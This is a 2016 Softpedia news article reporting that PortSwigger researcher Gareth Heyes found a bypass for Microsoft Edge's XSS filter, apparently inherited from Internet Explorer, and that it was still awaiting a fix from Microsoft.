The issue is not fixed, Microsoft still working on it

Apr 16, 2016 22:15 GMT  ·  By

Gareth Heyes, one of the security researchers working for PortSwigger, the company behind the famous Burp Suite security testing toolkit, has found a bypass for Microsoft Edge's built-in XSS filter.

What this means is that there's a way for attackers to run malicious JavaScript inside Edge while navigating various websites, despite some of the security measures that Microsoft has worked on to put in the browser.

XSS filters are present in almost all browsers, and they were added in order to stop XSS (cross-site scripting) attacks at the browser level, before reaching the website and its users.

Browser makers have been fighting to bolster Web security by taking it in their hands to prevent some simplistic attacks like XSS and CSRF. For example, besides XSS, there are anti-CSRF measures also included with browsers in the form of anti-CSRF tokens passed to cookies.

"Basically you use the object literal as a fake array which calls the join function that constructs a string from the object literal and passes it to valueOf which in turn passes it to the location object," the researcher explained the flaw on PortSwigger's blog.

IE issues strike again

Apparently, this issue was actually a flaw that got ported from some Internet Explorer code that made it into Edge, even if Edge is a new product altogether.

The issue was fixed in IE, but is not in Edge. Mr. Heyes says he found the flaw on September 4, 2015, when he also reported it to Microsoft.

"They acknowledged the report but didn't give me a timescale," Mr. Heyes told Softpedia. "I guess the complexity of detecting computed properties made via regex was quite difficult and probably why the fix is delayed."

The issue seems to be related to new properties introduced in ES6, the latest version of JavaScript released last year. This is not the first time that new ES6 features have aided attackers in carrying out XSS attacks. Proof-of-concept code is available here.

Softpedia has also reached out to Microsoft for details on the status of this issue. We'll update the article if we're provided with an answer.

Proof of concept for Edge XSS filter bypass
Proof of concept for Edge XSS filter bypass

Photo Gallery (2 Images)

Researcher finds XSS filter bypass in Edge
Proof of concept for Edge XSS filter bypass
Open gallery